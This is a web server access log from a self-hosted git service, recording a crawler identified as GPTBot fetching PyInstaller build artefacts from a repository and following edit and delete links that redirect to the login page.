GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 11145] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs" +[17/Feb/2026:18:50:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 11146] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs" +[17/Feb/2026:18:50:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 44615970] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" +[17/Feb/2026:18:50:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 892] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" +[17/Feb/2026:18:50:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 9811] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" +[17/Feb/2026:18:50:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" +[17/Feb/2026:18:50:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 33418] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" +[17/Feb/2026:18:50:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" +[17/Feb/2026:18:50:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 4613369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" +[17/Feb/2026:18:50:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 4587481] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" +[17/Feb/2026:18:50:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:50:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:50:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:50:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 928] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:50:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9826] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:50:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9828] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:50:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:50:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:50:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" +[17/Feb/2026:18:50:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 28375] [Gzip 20.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" +[17/Feb/2026:18:50:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9830] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:50:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 9808] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" +[17/Feb/2026:18:50:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 9811] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" +[17/Feb/2026:18:50:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt?display=source" [Client 74.7.227.38] [Length 14505] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" +[17/Feb/2026:18:50:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/localpycs" [Client 74.7.227.38] [Length 9814] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs" +[17/Feb/2026:18:50:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:50:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:51:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:51:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:51:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 9806] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" +[17/Feb/2026:18:51:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:51:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:51:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:51:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:51:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" +[17/Feb/2026:18:51:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot/EXE-00.toc" +[17/Feb/2026:18:51:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" +[17/Feb/2026:18:51:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot/EXE-00.toc" +[17/Feb/2026:18:51:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 896] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" +[17/Feb/2026:18:51:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 8077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" +[17/Feb/2026:18:51:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" +[17/Feb/2026:18:51:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:51:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:51:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:51:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:51:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs" [Client 74.7.227.38] [Length 10579] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" +[17/Feb/2026:18:51:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 9809] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" +[17/Feb/2026:18:51:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 14380] [Gzip 6.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" +[17/Feb/2026:18:51:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11129] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs" +[17/Feb/2026:18:51:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" +[17/Feb/2026:18:51:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor" +[17/Feb/2026:18:51:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 22341] [Gzip 11.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" +[17/Feb/2026:18:51:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 60401] [Gzip 16.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" +[17/Feb/2026:18:51:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 40722] [Gzip 14.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" +[17/Feb/2026:18:51:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 41185] [Gzip 14.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" +[17/Feb/2026:18:51:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 22591] [Gzip 11.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" +[17/Feb/2026:18:51:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 23510] [Gzip 11.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" +[17/Feb/2026:18:51:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldPilot/build/GoldMonitor/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs" +[17/Feb/2026:18:51:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldPilot/build/GoldMonitor/localpycs" +[17/Feb/2026:18:51:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 